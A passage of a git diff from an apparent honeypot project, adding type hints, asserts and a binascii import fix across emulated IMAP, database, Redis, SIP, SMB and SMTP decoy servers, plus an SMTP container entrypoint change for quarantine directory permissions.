"NOT_AUTHENTICATED" self._selected = None # mailbox name currently selected - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = self._transport.get_extra_info("peername", ("?", 0)) _log("connect", src=self._peer[0], src_port=self._peer[1]) banner = IMAP_BANNER if IMAP_BANNER.endswith("\r\n") else IMAP_BANNER + "\r\n" - transport.write(banner.encode()) + self._transport.write(banner.encode()) def data_received(self, data): self._buf += data @@ -519,6 +523,7 @@ class IMAPProtocol(asyncio.Protocol): elif cmd == "LOGOUT": self._w(b"* BYE Logging out\r\n") self._w(f"{tag} OK LOGOUT completed\r\n") + assert self._transport is not None self._transport.close() # NOT_AUTHENTICATED only @@ -638,6 +643,7 @@ class IMAPProtocol(asyncio.Protocol): if use_uid and "UID" not in items: items = ["UID"] + items + assert self._transport is not None for seq in indices: if 1 <= seq <= total: self._transport.write(_build_fetch_response(seq, emails[seq - 1], items)) @@ -662,6 +668,7 @@ class IMAPProtocol(asyncio.Protocol): # ── Helpers ─────────────────────────────────────────────────────────────── def _w(self, data: str | bytes) -> None: + assert self._transport is not None if isinstance(data, str): data = data.encode() self._transport.write(data) diff --git a/decnet/templates/imap/syslog_bridge.py b/decnet/templates/imap/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/imap/syslog_bridge.py +++ b/decnet/templates/imap/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/k8s/syslog_bridge.py b/decnet/templates/k8s/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/k8s/syslog_bridge.py +++ b/decnet/templates/k8s/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/ldap/server.py b/decnet/templates/ldap/server.py index 67126d35..3b9ffb5d 100644 --- a/decnet/templates/ldap/server.py +++ b/decnet/templates/ldap/server.py @@ -8,6 +8,7 @@ invalidCredentials error. Logs all interactions as JSON. import asyncio import os import re +from typing import cast import instance_seed as _seed from syslog_bridge import ( @@ -137,14 +138,17 @@ def _bind_error_response(message_id: int, result_code: int = 49, error_text: str class LDAPProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) def data_received(self, data): @@ -171,7 +175,9 @@ class LDAPProtocol(asyncio.Protocol): self._buf = self._buf[msg_len:] self._handle_message(msg) - def _handle_message(self, msg: bytes): + def _handle_message(self, msg: bytes) -> None: + assert self._transport is not None + assert self._peer is not None # Extract messageID for the response try: message_id = msg[4] if len(msg) > 4 else 1 diff --git a/decnet/templates/ldap/syslog_bridge.py b/decnet/templates/ldap/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/ldap/syslog_bridge.py +++ b/decnet/templates/ldap/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/llmnr/syslog_bridge.py b/decnet/templates/llmnr/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/llmnr/syslog_bridge.py +++ b/decnet/templates/llmnr/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/mongodb/server.py b/decnet/templates/mongodb/server.py index 6a06cd2b..0d1cdc12 100644 --- a/decnet/templates/mongodb/server.py +++ b/decnet/templates/mongodb/server.py @@ -8,8 +8,10 @@ received messages as JSON. import asyncio import base64 +import binascii import os import struct +from typing import cast import instance_seed as _seed from syslog_bridge import syslog_line, write_syslog_file, forward_syslog @@ -197,6 +199,9 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class MongoDBProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None @@ -207,12 +212,13 @@ class MongoDBProtocol(asyncio.Protocol): self._sasl_username: str | None = None self._sasl_mechanism: str | None = None - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) - def data_received(self, data): + def data_received(self, data: bytes) -> None: + assert self._transport is not None self._buf += data while len(self._buf) >= 16: msg_len = struct.unpack(" None: + assert self._transport is not None + assert self._peer is not None if len(msg) < 16: return request_id = struct.unpack(" None: + assert self._peer is not None """Parse a single MongoDB command document for SCRAM auth. saslStart — client-first-message in payload. Extract @@ -318,7 +327,7 @@ class MongoDBProtocol(asyncio.Protocol): return try: proof_raw = base64.b64decode(proof_b64, validate=True) - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return mech = (self._sasl_mechanism or "").upper() if "SHA-256" in mech or "SHA256" in mech: diff --git a/decnet/templates/mongodb/syslog_bridge.py b/decnet/templates/mongodb/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/mongodb/syslog_bridge.py +++ b/decnet/templates/mongodb/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/mqtt/server.py b/decnet/templates/mqtt/server.py index 0e4a3ee7..ab0b1884 100644 --- a/decnet/templates/mqtt/server.py +++ b/decnet/templates/mqtt/server.py @@ -12,6 +12,7 @@ import json import os import random import struct +from typing import cast import instance_seed as _seed from syslog_bridge import ( @@ -209,6 +210,9 @@ def _generate_topics() -> dict: class MQTTProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None @@ -216,9 +220,9 @@ class MQTTProtocol(asyncio.Protocol): self._auth = False self._topics = _generate_topics() - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) def data_received(self, data): @@ -231,6 +235,8 @@ class MQTTProtocol(asyncio.Protocol): self._transport.close() def _process(self): + assert self._transport is not None + assert self._peer is not None while len(self._buf) >= 2: pkt_byte = self._buf[0] pkt_type = (pkt_byte >> 4) & 0x0f diff --git a/decnet/templates/mqtt/syslog_bridge.py b/decnet/templates/mqtt/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/mqtt/syslog_bridge.py +++ b/decnet/templates/mqtt/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/mssql/server.py b/decnet/templates/mssql/server.py index d647f513..1d8618f7 100644 --- a/decnet/templates/mssql/server.py +++ b/decnet/templates/mssql/server.py @@ -9,6 +9,7 @@ import asyncio import base64 import os import struct +from typing import cast import instance_seed as _seed from syslog_bridge import syslog_line, write_syslog_file, forward_syslog @@ -108,18 +109,23 @@ def _tds_error_packet(message: str) -> bytes: class MSSQLProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" self._prelogin_done = False - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) - def data_received(self, data): + def data_received(self, data: bytes) -> None: + assert self._transport is not None + assert self._peer is not None self._buf += data while len(self._buf) >= 8: pkt_type = self._buf[0] @@ -138,7 +144,9 @@ class MSSQLProtocol(asyncio.Protocol): self._buf = b"" break - def _handle_packet(self, pkt_type: int, payload: bytes): + def _handle_packet(self, pkt_type: int, payload: bytes) -> None: + assert self._transport is not None + assert self._peer is not None if pkt_type == 0x12: # Pre-login self._transport.write(_PRELOGIN_RESP) self._prelogin_done = True diff --git a/decnet/templates/mssql/syslog_bridge.py b/decnet/templates/mssql/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/mssql/syslog_bridge.py +++ b/decnet/templates/mssql/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/mysql/server.py b/decnet/templates/mysql/server.py index 17de3f33..59cd39b5 100644 --- a/decnet/templates/mysql/server.py +++ b/decnet/templates/mysql/server.py @@ -11,6 +11,7 @@ import base64 import itertools import os import struct +from typing import cast import instance_seed as _seed from syslog_bridge import syslog_line, write_syslog_file, forward_syslog @@ -74,6 +75,9 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class MySQLProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None @@ -84,15 +88,16 @@ class MySQLProtocol(asyncio.Protocol): # same decky never present identical auth challenges. self._salt = _seed.fresh_bytes(20) - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1], connection_id=self._conn_id) - transport.write(_make_packet(_build_greeting(self._conn_id, self._salt), seq=0)) + self._transport.write(_make_packet(_build_greeting(self._conn_id, self._salt), seq=0)) self._greeted = True - def data_received(self, data): + def data_received(self, data: bytes) -> None: + assert self._transport is not None self._buf += data # MySQL packets: 3-byte length + 1-byte seq + payload while len(self._buf) >= 4: @@ -107,7 +112,8 @@ class MySQLProtocol(asyncio.Protocol): self._buf = self._buf[4 + length:] self._handle_packet(payload) - def _handle_packet(self, payload: bytes): + def _handle_packet(self, payload: bytes) -> None: + assert self._peer is not None if not payload: return # Login packet: capability flags (4), max_packet (4), charset (1), diff --git a/decnet/templates/mysql/syslog_bridge.py b/decnet/templates/mysql/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/mysql/syslog_bridge.py +++ b/decnet/templates/mysql/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/pop3/server.py b/decnet/templates/pop3/server.py index b7c82a22..49669240 100644 --- a/decnet/templates/pop3/server.py +++ b/decnet/templates/pop3/server.py @@ -13,6 +13,7 @@ import asyncio import os import time from pathlib import Path +from typing import cast from syslog_bridge import ( SEVERITY_WARNING, encode_secret, @@ -238,6 +239,9 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: # ── Protocol ────────────────────────────────────────────────────────────────── class POP3Protocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] + def __init__(self): self._transport = None self._peer = ("?", 0) @@ -246,14 +250,14 @@ class POP3Protocol(asyncio.Protocol): self._current_user: str | None = None self._deleted: set[int] = set() # 0-based indices of DELE'd messages - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = self._transport.get_extra_info("peername", ("?", 0)) _log("connect", src=self._peer[0], src_port=self._peer[1]) banner = POP3_BANNER if POP3_BANNER.endswith("\r\n") else POP3_BANNER + "\r\n" if not banner.startswith("+OK"): banner = "+OK " + banner - transport.write(banner.encode()) + self._transport.write(banner.encode()) def data_received(self, data): self._buf += data @@ -267,6 +271,7 @@ class POP3Protocol(asyncio.Protocol): # ── Command dispatch ────────────────────────────────────────────────────── def _handle_line(self, line: str) -> None: + assert self._transport is not None parts = line.split(None, 1) if not parts: return @@ -314,6 +319,7 @@ class POP3Protocol(asyncio.Protocol): # ── Command implementations ─────────────────────────────────────────────── def _cmd_user(self, args: str) -> None: + assert self._transport is not None if self._state != "AUTHORIZATION": self._transport.write(b"-ERR Already authenticated\r\n") return @@ -321,6 +327,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"+OK User name accepted, password please\r\n") def _cmd_pass(self, args: str) -> None: + assert self._transport is not None if self._state != "AUTHORIZATION": self._transport.write(b"-ERR Already authenticated\r\n") return @@ -342,6 +349,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"-ERR Authentication failed.\r\n") def _require_transaction(self) -> bool: + assert self._transport is not None if self._state != "TRANSACTION": self._transport.write(b"-ERR Not authenticated\r\n") return False @@ -356,6 +364,7 @@ class POP3Protocol(asyncio.Protocol): ] def _cmd_stat(self) -> None: + assert self._transport is not None if not self._require_transaction(): return msgs = self._active_messages() @@ -363,6 +372,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(f"+OK {len(msgs)} {total}\r\n".encode()) def _cmd_list(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return emails = _get_emails() @@ -386,6 +396,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b".\r\n") def _cmd_retr(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return try: @@ -407,6 +418,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"-ERR Invalid argument\r\n") def _cmd_top(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return try: @@ -436,6 +448,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"-ERR Invalid arguments\r\n") def _cmd_uidl(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return if args: @@ -455,6 +468,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b".\r\n") def _cmd_dele(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return try: @@ -470,6 +484,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"-ERR Invalid argument\r\n") def _cmd_rset(self) -> None: + assert self._transport is not None if not self._require_transaction(): return self._deleted.clear() diff --git a/decnet/templates/pop3/syslog_bridge.py b/decnet/templates/pop3/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/pop3/syslog_bridge.py +++ b/decnet/templates/pop3/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/postgres/server.py b/decnet/templates/postgres/server.py index 7917000b..a69c1c77 100644 --- a/decnet/templates/postgres/server.py +++ b/decnet/templates/postgres/server.py @@ -9,6 +9,7 @@ returns an error. Logs all interactions as JSON. import asyncio import os import struct +from typing import cast import instance_seed as _seed import base64 as _base64 @@ -59,15 +60,18 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class PostgresProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" self._state = "startup" - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) def data_received(self, data): @@ -75,6 +79,7 @@ class PostgresProtocol(asyncio.Protocol): self._process() def _process(self): + assert self._transport is not None if self._state == "startup": if len(self._buf) < 4: return @@ -104,7 +109,9 @@ class PostgresProtocol(asyncio.Protocol): if msg_type == "p": self._handle_password(payload) - def _handle_startup(self, msg: bytes): + def _handle_startup(self, msg: bytes) -> None: + assert self._transport is not None + assert self._peer is not None # Startup message: length(4) + protocol_version(4) + params (key=value\0 pairs) if len(msg) < 8: return @@ -128,8 +135,8 @@ class PostgresProtocol(asyncio.Protocol): # rejects *before* asking for a password. Short-circuit so the decoy # matches that behavior and exposes the per-decky DB list. if database and database not in _DATABASES: - msg = f'database "{database}" does not exist' - self._transport.write(_error_response("FATAL", "3D000", msg)) + err_msg = f'database "{database}" does not exist' + self._transport.write(_error_response("FATAL", "3D000", err_msg)) self._transport.close() return self._state = "auth" @@ -137,7 +144,9 @@ class PostgresProtocol(asyncio.Protocol): auth_md5 = b"R" + struct.pack(">I", 12) + struct.pack(">I", 5) + salt self._transport.write(auth_md5) - def _handle_password(self, payload: bytes): + def _handle_password(self, payload: bytes) -> None: + assert self._transport is not None + assert self._peer is not None # Postgres MD5 challenge-response: the wire form is the literal # ASCII string "md5" + 32 hex chars (md5(md5(pw+user)+salt)). # Plaintext is unrecoverable, so we land this in the Credential diff --git a/decnet/templates/postgres/syslog_bridge.py b/decnet/templates/postgres/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/postgres/syslog_bridge.py +++ b/decnet/templates/postgres/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/rdp/ntlmssp.py b/decnet/templates/rdp/ntlmssp.py index b0271a9a..95db7c66 100644 --- a/decnet/templates/rdp/ntlmssp.py +++ b/decnet/templates/rdp/ntlmssp.py @@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]: if domain: principal = f"{domain}\\{username}" else: - principal = username or None + principal = username return { "username": username, diff --git a/decnet/templates/rdp/server.py b/decnet/templates/rdp/server.py index 3b7426e7..68f188a1 100644 --- a/decnet/templates/rdp/server.py +++ b/decnet/templates/rdp/server.py @@ -331,6 +331,7 @@ async def _upgrade_to_tls_and_capture( # into a StreamReader/StreamWriter pair the rest of the handler can use. new_reader = asyncio.StreamReader(loop=loop) new_protocol = asyncio.StreamReaderProtocol(new_reader, loop=loop) + assert new_transport is not None new_transport.set_protocol(new_protocol) new_protocol.connection_made(new_transport) new_writer = asyncio.StreamWriter(new_transport, new_protocol, new_reader, loop) diff --git a/decnet/templates/rdp/syslog_bridge.py b/decnet/templates/rdp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/rdp/syslog_bridge.py +++ b/decnet/templates/rdp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/redis/server.py b/decnet/templates/redis/server.py index 8e09ec67..d9e1c246 100644 --- a/decnet/templates/redis/server.py +++ b/decnet/templates/redis/server.py @@ -7,6 +7,7 @@ KEYS, and arbitrary commands. Logs every command and argument as JSON. import asyncio import os +from typing import cast import instance_seed as _seed from syslog_bridge import ( @@ -203,15 +204,18 @@ def _config_get(pattern: str) -> bytes: class RedisProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._parser = RESPParser() self._authed = not _REQUIREPASS # auth satisfied iff no password set - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) def data_received(self, data): @@ -228,7 +232,8 @@ class RedisProtocol(asyncio.Protocol): if self._transport and not self._transport.is_closing(): self._transport.write(payload) - def _handle_command(self, parts): + def _handle_command(self, parts) -> None: + assert self._peer is not None if not parts: return verb = parts[0].upper() diff --git a/decnet/templates/redis/syslog_bridge.py b/decnet/templates/redis/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/redis/syslog_bridge.py +++ b/decnet/templates/redis/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/sip/server.py b/decnet/templates/sip/server.py index 66e504b1..0915f087 100644 --- a/decnet/templates/sip/server.py +++ b/decnet/templates/sip/server.py @@ -8,6 +8,7 @@ Authorization header and call metadata, then responds with 401 Unauthorized. import asyncio import os import re +from typing import cast from syslog_bridge import ( classify_authorization, forward_syslog, @@ -98,11 +99,13 @@ def _handle_message(data: bytes, src_addr) -> bytes | None: class SIPUDPProtocol(asyncio.DatagramProtocol): + _transport: asyncio.DatagramTransport | None = None + def __init__(self): self._transport = None - def connection_made(self, transport): - self._transport = transport + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.DatagramTransport, transport) def datagram_received(self, data, addr): response = _handle_message(data, addr) @@ -111,21 +114,24 @@ class SIPUDPProtocol(asyncio.DatagramProtocol): class SIPTCPProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) - def data_received(self, data): + def data_received(self, data: bytes) -> None: self._buf += data if b"\r\n\r\n" in self._buf or b"\n\n" in self._buf: response = _handle_message(self._buf, self._peer) self._buf = b"" - if response: + if response and self._transport: self._transport.write(response) def connection_lost(self, exc): diff --git a/decnet/templates/sip/syslog_bridge.py b/decnet/templates/sip/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/sip/syslog_bridge.py +++ b/decnet/templates/sip/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/smb/ntlmssp.py b/decnet/templates/smb/ntlmssp.py index b0271a9a..95db7c66 100644 --- a/decnet/templates/smb/ntlmssp.py +++ b/decnet/templates/smb/ntlmssp.py @@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]: if domain: principal = f"{domain}\\{username}" else: - principal = username or None + principal = username return { "username": username, diff --git a/decnet/templates/smb/syslog_bridge.py b/decnet/templates/smb/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/smb/syslog_bridge.py +++ b/decnet/templates/smb/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/smtp/Dockerfile b/decnet/templates/smtp/Dockerfile index 68d28efa..d8a695c0 100644 --- a/decnet/templates/smtp/Dockerfile +++ b/decnet/templates/smtp/Dockerfile @@ -20,5 +20,6 @@ RUN useradd -r -s /bin/false -d /opt logrelay \ HEALTHCHECK --interval=30s --timeout=5s --start-period=10s --retries=3 \ CMD kill -0 1 || exit 1 -USER logrelay +# Entrypoint runs as root so it can fix quarantine dir permissions before +# dropping to logrelay via su. ENTRYPOINT ["/entrypoint.sh"] diff --git a/decnet/templates/smtp/entrypoint.sh b/decnet/templates/smtp/entrypoint.sh index c830b733..528bdacf 100644 --- a/decnet/templates/smtp/entrypoint.sh +++ b/decnet/templates/smtp/entrypoint.sh @@ -1,3 +1,12 @@ #!/bin/bash set -e -exec python3 /opt/server.py + +# Fix quarantine dir permissions before dropping privileges — the dir is +# bind-mounted from the host (owned by the decnet user) and must be writable +# by the logrelay process inside the container. +if [ -n "$SMTP_QUARANTINE_DIR" ]; then + mkdir -p "$SMTP_QUARANTINE_DIR" + chmod 0777 "$SMTP_QUARANTINE_DIR" +fi + +exec su -s /bin/sh logrelay -c "exec python3 /opt/server.py" diff --git a/decnet/templates/smtp/server.py b/decnet/templates/smtp/server.py index 537c2f90..fbc888ef 100644 --- a/decnet/templates/smtp/server.py +++ b/decnet/templates/smtp/server.py @@ -30,6 +30,7 @@ from datetime import datetime, timezone from email import message_from_bytes from email.header import decode_header, make_header from email.message import Message +from typing import cast import instance_seed as _seed from syslog_bridge import ( @@ -41,7 +42,7 @@ from syslog_bridge import ( ) NODE_NAME = os.environ.get("NODE_NAME", "mailserver") -SERVICE_NAME = "smtp" +SERVICE_NAME = os.environ.get("SMTP_SERVICE_NAME", "smtp") LOG_TARGET = os.environ.get("LOG_TARGET", "") PORT = int(os.environ.get("PORT", "25")) OPEN_RELAY = os.environ.get("SMTP_OPEN_RELAY", "0").strip() == "1" @@ -150,7 +151,8 @@ def _summarize_message(body: bytes, msg_id: str) -> dict: if not filename and "attachment" not in disposition: continue try: - payload = part.get_payload(decode=True) or b"" + _raw = part.get_payload(decode=True) or b"" + payload: bytes = _raw if isinstance(_raw, bytes) else b"" except Exception: payload = b"" attachments.append({ @@ -207,6 +209,9 @@ def _decode_auth_plain(blob: str) -> 